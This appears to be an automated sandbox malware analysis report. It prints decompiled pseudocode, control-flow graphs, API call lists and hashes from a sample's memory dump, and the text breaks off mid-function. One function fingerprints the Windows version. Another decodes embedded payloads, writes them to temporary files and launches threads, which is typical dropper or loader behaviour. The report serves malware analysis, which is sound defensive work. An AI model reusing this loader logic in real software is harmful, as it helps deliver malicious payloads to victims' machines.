                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B931FBB5E00209EFEB04CF98C494AEEB7B5EF48308F10C169E909A7390D735AA45CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 204 4008f80-4008f94 205 4008f9a-4008f9e 204->205 206 400927b-4009281 204->206 205->206 207 4008fa4-4008fa8 205->207 207->206 208 4008fae-4008fff call 4007d20 * 3 GetVersionExA 207->208 215 4009005-4009016 GetSystemInfo 208->215 216 4009266-400926a 208->216 218 4009115-400911c 215->218 219 400901c-4009023 215->219 216->206 217 400926c-4009275 lstrcatA 216->217 217->206 220 4009210-4009217 call 4009290 218->220 221 4009122-4009129 218->221 222 4009042-4009049 219->222 223 4009025-400903d lstrcatA 219->223 241 4009228-4009237 lstrlenA 220->241 242 4009219-4009222 lstrcatA 220->242 224 4009174-400917b 221->224 225 400912b-4009132 221->225 228 4009068-400906f 222->228 229 400904b-4009063 lstrcatA 222->229 227 4009110 223->227 234 40091c3-40091ca 224->234 235 400917d-4009184 224->235 230 4009134-400914c lstrcatA 225->230 231 400914e-4009155 225->231 227->220 228->227 233 4009075-400907c 228->233 229->227 239 400916f 230->239 231->239 240 4009157-4009169 lstrcatA 231->240 243 40090a1-40090ab GetSystemMetrics 233->243 244 400907e-4009085 233->244 234->220 238 40091cc-40091d3 234->238 236 40091a0-40091a7 235->236 237 4009186-400919e lstrcatA 235->237 245 40091c1 236->245 248 40091a9-40091bb lstrcatA 236->248 237->245 249 40091d5-40091ed lstrcatA 238->249 250 40091ef-40091f6 238->250 239->220 240->239 251 4009259-4009263 lstrlenA 241->251 252 4009239-4009253 lstrcatA * 2 241->252 242->241 246 40090c7-40090d1 GetSystemMetrics 243->246 247 40090ad-40090c5 lstrcatA 243->247 244->243 253 4009087-400909f lstrcatA 244->253 245->220 254 40090d3-40090eb lstrcatA 246->254 255 40090ed-40090f6 246->255 247->227 248->245 249->220 250->220 256 40091f8-400920a lstrcatA 250->256 251->216 252->251 253->227 254->227 255->227 257 40090f8-400910a lstrcatA 255->257 256->220 257->227
                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                                          				signed int _v50;
                                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                                          					L45:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                                          					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                                          					E04007D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                                          					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                                          						L43:
                                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L45;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                                          					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                                          						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                          								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                          									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                                          												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                                          											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                                          											 *_a12 = 8;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                                          										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                                          										 *_a12 = 9;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                                          									 *_a12 = 7;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L38:
                                                                                                                                                                                                                                                                                          						if(E04009290() != 0) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                          						goto L43;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                          						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                                          									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                                          										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                                          											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                                          												 *_a12 = 4;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                                          											 *_a12 = 6;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                                          										 *_a12 = 5;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                                          									 *_a12 = 3;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                                          							 *_a12 = 2;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                                          						 *_a12 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x04008f89
                                                                                                                                                                                                                                                                                          0x04008f94
                                                                                                                                                                                                                                                                                          0x0400927b
                                                                                                                                                                                                                                                                                          0x04009281
                                                                                                                                                                                                                                                                                          0x04008fae
                                                                                                                                                                                                                                                                                          0x04008fce
                                                                                                                                                                                                                                                                                          0x04008fd6
                                                                                                                                                                                                                                                                                          0x04008fe8
                                                                                                                                                                                                                                                                                          0x04008fff
                                                                                                                                                                                                                                                                                          0x04009266
                                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                                          0x04009009
                                                                                                                                                                                                                                                                                          0x04009016
                                                                                                                                                                                                                                                                                          0x0400911c
                                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                                          0x0400917b
                                                                                                                                                                                                                                                                                          0x040091ca
                                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                                          0x040091f6
                                                                                                                                                                                                                                                                                          0x04009201
                                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                                          0x040091d5
                                                                                                                                                                                                                                                                                          0x040091de
                                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                                          0x0400917d
                                                                                                                                                                                                                                                                                          0x04009184
                                                                                                                                                                                                                                                                                          0x040091a7
                                                                                                                                                                                                                                                                                          0x040091b2
                                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                                          0x04009186
                                                                                                                                                                                                                                                                                          0x0400918f
                                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                                          0x040091c1
                                                                                                                                                                                                                                                                                          0x0400912b
                                                                                                                                                                                                                                                                                          0x04009132
                                                                                                                                                                                                                                                                                          0x04009155
                                                                                                                                                                                                                                                                                          0x04009160
                                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                                          0x04009134
                                                                                                                                                                                                                                                                                          0x0400913d
                                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                                          0x0400916f
                                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                                          0x04009210
                                                                                                                                                                                                                                                                                          0x04009217
                                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                                          0x04009237
                                                                                                                                                                                                                                                                                          0x04009242
                                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                                          0x04009023
                                                                                                                                                                                                                                                                                          0x04009049
                                                                                                                                                                                                                                                                                          0x0400906f
                                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                                          0x040090ab
                                                                                                                                                                                                                                                                                          0x040090d1
                                                                                                                                                                                                                                                                                          0x040090f6
                                                                                                                                                                                                                                                                                          0x04009101
                                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                                          0x040090d3
                                                                                                                                                                                                                                                                                          0x040090dc
                                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                                          0x040090ad
                                                                                                                                                                                                                                                                                          0x040090b6
                                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                                          0x04009087
                                                                                                                                                                                                                                                                                          0x04009090
                                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                                          0x0400904b
                                                                                                                                                                                                                                                                                          0x04009054
                                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                                          0x04009025
                                                                                                                                                                                                                                                                                          0x0400902e
                                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009110

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinXP), ref: 04009054
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Vista), ref: 0400913D
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 04009160
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0400918F
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win7), ref: 040091B2
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 040091DE
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win8), ref: 04009201
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                                          • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                                          • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                                          • Opcode ID: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                                          • Instruction ID: 2fdea20511d00b83c143a5217ffb9651c4d2114897e9ccdf2931e29d93762e72
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A81F9B4644209EBFB249F60C849BAE7BB5FB49301F00C659F905BA2C1D779E9C1CB61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 298 40062b0-40062c4 299 40062ca-40062ce 298->299 300 4006c4e 298->300 299->300 301 40062d4-40062e0 299->301 302 4006c51-4006c54 300->302 301->300 303 40062e6-40062ed 301->303 303->300 304 40062f3-4006314 303->304 306 400631a-400631e 304->306 307 400642e-4006453 304->307 308 4006320-400633a 306->308 309 4006343-4006363 306->309 311 4006459-400645d 307->311 312 4006c2f-4006c36 307->312 308->309 313 400633c-400633e 308->313 314 4006429 309->314 315 4006369-4006375 309->315 316 4006482-40064a2 311->316 317 400645f-4006479 311->317 318 4006c44 312->318 319 4006c38-4006c42 312->319 313->302 314->307 315->314 320 400637b-4006384 315->320 321 40065f3-40065fc 316->321 322 40064a8-40064b4 316->322 317->316 323 400647b-400647d 317->323 318->300 319->300 320->314 324 400638a-4006393 320->324 325 4006603-400660f 321->325 326 40065fe 321->326 322->321 327 40064ba-400654c GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 322->327 323->302 324->314 328 4006399-40063a2 324->328 330 4006615-4006621 325->330 331 4006bdd-4006be9 325->331 326->326 327->321 356 4006552-4006586 WriteFile 327->356 332 4006410-4006424 call 4001ee0 328->332 333 40063a4-40063ca VirtualAlloc 328->333 330->331 338 4006627-4006640 call 4007250 330->338 334 4006c18-4006c24 331->334 335 4006beb-4006bf7 331->335 346 4006427 332->346 339 40063cc-40063e4 call 4006260 333->339 340 400640e 333->340 343 4006c26 334->343 344 4006c2a 334->344 335->334 342 4006bf9-4006c16 call 400a360 335->342 357 4006642 338->357 358 4006647-400664e 338->358 353 40063e6-40063fa call 4001ee0 339->353 354 40063fd-4006408 VirtualFree 339->354 340->346 342->344 343->344 344->344 346->307 353->354 354->340 362 4006588-4006591 356->362 363 40065dd-40065e4 356->363 357->358 359 4006752-400675b 358->359 360 4006654-4006674 VirtualAlloc 358->360 367 4006761-4006788 359->367 368 40069ba-4006a49 GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 359->368 360->359 364 400667a-4006747 call 4007b70 call 40097a0 CreateThread CloseHandle 360->364 362->363 369 4006593-40065c7 CloseHandle call 4006c60 call 4001e60 362->369 363->321 365 40065e6-40065ed CloseHandle 363->365 364->359 365->321 372 4006858-4006864 call 4002070 367->372 373 400678e-40067c0 VirtualAlloc 367->373 395 4006bd6 368->395 396 4006a4f-4006a75 368->396 393 40065d8 369->393 394 40065c9-40065d0 call 40074a0 ExitProcess 369->394 383 400686a-4006871 372->383 378 4006856 373->378 379 40067c6-40067e7 call 4006260 373->379 378->383 399 4006842-4006850 VirtualFree 379->399 400 40067e9-4006807 call 4002070 379->400 389 40069b0 383->389 390 4006877-400687e 383->390 389->368 397 4006880-4006891 call 40073c0 390->397 398 4006894-400689d 390->398 393->363 402 40065d8 call 4006cf0 393->402 395->331 403 4006a7b-4006aad VirtualAlloc 396->403 404 4006b1e-4006b3c WriteFile 396->404 397->398 406 40068a3-40068c8 call 40097a0 398->406 407 400698a-4006993 398->407 399->378 400->399 419 4006809-400683a VirtualAlloc call 4007b70 400->419 402->363 410 4006b1c 403->410 411 4006aaf-4006ad0 call 4006260 403->411 415 4006b42-4006b49 404->415 424 40068e9-400690d VirtualAlloc 406->424 425 40068ca-40068e7 406->425 412 4006995-40069a6 call 4002510 407->412 413 40069a9 407->413 410->415 434 4006ad2-4006b02 WriteFile 411->434 435 4006b08-4006b16 VirtualFree 411->435 412->413 413->389 422 4006bc9-4006bd0 CloseHandle 415->422 423 4006b4b-4006b57 415->423 432 400683f 419->432 422->395 423->422 429 4006b59-4006b82 CloseHandle call 4001e60 423->429 431 4006934-400693d 424->431 433 400690f-4006931 call 4007b70 424->433 425->431 439 4006b84-4006b8b 429->439 440 4006bc7 429->440 431->407 438 400693f-4006984 CreateThread CloseHandle 431->438 432->399 433->431 434->435 435->410 438->407 442 4006ba1-4006baa 439->442 443 4006b8d-4006b9e call 40073c0 439->443 440->395 445 4006bc0 442->445 446 4006bac-4006bbd call 4002510 442->446 443->442 445->440 446->445
                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040062B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                                          				void _v60;
                                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                                          				int _v608;
                                                                                                                                                                                                                                                                                          				long _v612;
                                                                                                                                                                                                                                                                                          				signed int _v616;
                                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                                          				void* _v624;
                                                                                                                                                                                                                                                                                          				void* _v628;
                                                                                                                                                                                                                                                                                          				int _v632;
                                                                                                                                                                                                                                                                                          				signed int _v636;
                                                                                                                                                                                                                                                                                          				long _v640;
                                                                                                                                                                                                                                                                                          				void* _v644;
                                                                                                                                                                                                                                                                                          				void* _v648;
                                                                                                                                                                                                                                                                                          				void* _v652;
                                                                                                                                                                                                                                                                                          				char _v916;
                                                                                                                                                                                                                                                                                          				void* _v920;
                                                                                                                                                                                                                                                                                          				char _v932;
                                                                                                                                                                                                                                                                                          				char _v1196;
                                                                                                                                                                                                                                                                                          				long _v1200;
                                                                                                                                                                                                                                                                                          				int _v1204;
                                                                                                                                                                                                                                                                                          				long _v1208;
                                                                                                                                                                                                                                                                                          				void* _v1212;
                                                                                                                                                                                                                                                                                          				long _v1216;
                                                                                                                                                                                                                                                                                          				signed int _v1220;
                                                                                                                                                                                                                                                                                          				void* _v1224;
                                                                                                                                                                                                                                                                                          				void* _v1228;
                                                                                                                                                                                                                                                                                          				intOrPtr _t317;
                                                                                                                                                                                                                                                                                          				signed char _t321;
                                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                                          				signed int _t340;
                                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                                          				signed int _t355;
                                                                                                                                                                                                                                                                                          				void* _t361;
                                                                                                                                                                                                                                                                                          				void* _t368;
                                                                                                                                                                                                                                                                                          				void* _t378;
                                                                                                                                                                                                                                                                                          				void* _t381;
                                                                                                                                                                                                                                                                                          				signed int _t383;
                                                                                                                                                                                                                                                                                          				void* _t386;
                                                                                                                                                                                                                                                                                          				void* _t393;
                                                                                                                                                                                                                                                                                          				int _t415;
                                                                                                                                                                                                                                                                                          				signed int _t421;
                                                                                                                                                                                                                                                                                          				signed int _t428;
                                                                                                                                                                                                                                                                                          				signed char _t433;
                                                                                                                                                                                                                                                                                          				void* _t439;
                                                                                                                                                                                                                                                                                          				signed char _t442;
                                                                                                                                                                                                                                                                                          				void* _t448;
                                                                                                                                                                                                                                                                                          				signed int _t452;
                                                                                                                                                                                                                                                                                          				intOrPtr _t455;
                                                                                                                                                                                                                                                                                          				void* _t465;
                                                                                                                                                                                                                                                                                          				void* _t472;
                                                                                                                                                                                                                                                                                          				void* _t473;
                                                                                                                                                                                                                                                                                          				void* _t508;
                                                                                                                                                                                                                                                                                          				void* _t509;
                                                                                                                                                                                                                                                                                          				void* _t528;
                                                                                                                                                                                                                                                                                          				void* _t529;
                                                                                                                                                                                                                                                                                          				void* _t539;
                                                                                                                                                                                                                                                                                          				void* _t549;
                                                                                                                                                                                                                                                                                          				void* _t550;
                                                                                                                                                                                                                                                                                          				void* _t551;
                                                                                                                                                                                                                                                                                          				void* _t563;
                                                                                                                                                                                                                                                                                          				void* _t598;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L99:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 =  *_a4;
                                                                                                                                                                                                                                                                                          					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                                          							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                                          								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                          								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									L22:
                                                                                                                                                                                                                                                                                          									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                                          									__eflags = _t428;
                                                                                                                                                                                                                                                                                          									_v24 = _t428;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t508 = _v20;
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                          								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *0x401435d & 0x000000ff;
                                                                                                                                                                                                                                                                                          								if(( *0x401435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t509 = _v20;
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                          								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          									_t433 = E04001EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                                          									L21:
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								__eflags = _v40;
                                                                                                                                                                                                                                                                                          								if(_v40 == 0) {
                                                                                                                                                                                                                                                                                          									L19:
                                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t439 = E04006260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                                          								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                                          								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                                          									_t442 = E04001EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                                          									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                          									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							} else {
